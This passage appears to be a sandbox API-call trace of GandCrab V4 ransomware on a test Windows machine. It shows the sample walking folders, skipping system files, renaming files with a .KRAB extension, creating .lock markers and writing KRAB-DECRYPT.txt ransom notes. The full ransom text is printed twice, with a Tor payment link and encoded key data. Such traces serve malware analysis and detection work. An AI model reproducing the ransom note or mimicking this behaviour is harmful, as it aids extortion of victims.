wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.264] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 121 [0059.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 121 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.264] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.264] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.265] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0059.265] FindClose (in: hFindFile=0xfbd620 | out: hFindFile=0xfbd620) returned 1 [0059.265] CloseHandle (hObject=0x448) returned 1 [0059.265] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0059.265] FindClose (in: hFindFile=0xfbd4a0 | out: hFindFile=0xfbd4a0) returned 1 [0059.265] CloseHandle (hObject=0x440) returned 1 [0059.265] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0059.265] FindClose (in: hFindFile=0xfbd420 | out: hFindFile=0xfbd420) returned 1 [0059.266] CloseHandle (hObject=0x3ac) returned 1 [0059.266] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0059.266] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.266] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.266] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock" [0059.266] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.266] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 76 [0059.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned 71 [0059.266] lstrlenW (lpString=".lock") returned 5 [0059.266] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.267] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.267] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.267] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.267] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0059.267] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0059.267] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0059.267] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Document Building Blocks" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0059.267] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0059.267] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.268] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.268] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.268] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\KRAB-DECRYPT.txt") returned 90 [0059.269] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0059.270] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.270] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.271] CloseHandle (hObject=0x3ac) returned 1 [0059.272] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.272] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.272] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x1dd)) [0059.272] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.273] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.273] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.273] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a08d2ca4dee3d.lock") returned 96 [0059.273] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0059.275] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.275] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.276] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 73 [0059.276] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0059.276] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd960 [0059.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.276] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.276] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.276] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.276] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.276] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0059.276] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0059.276] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0059.276] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0059.276] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.277] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.277] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.277] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.277] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.277] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.277] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\KRAB-DECRYPT.txt") returned 95 [0059.277] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0059.279] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.279] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.279] CloseHandle (hObject=0x440) returned 1 [0059.280] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.280] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.280] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x1dd)) [0059.280] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.281] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.281] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.281] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a08d2ca4dee3d.lock") returned 101 [0059.281] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0059.282] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.283] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.283] lstrlenW 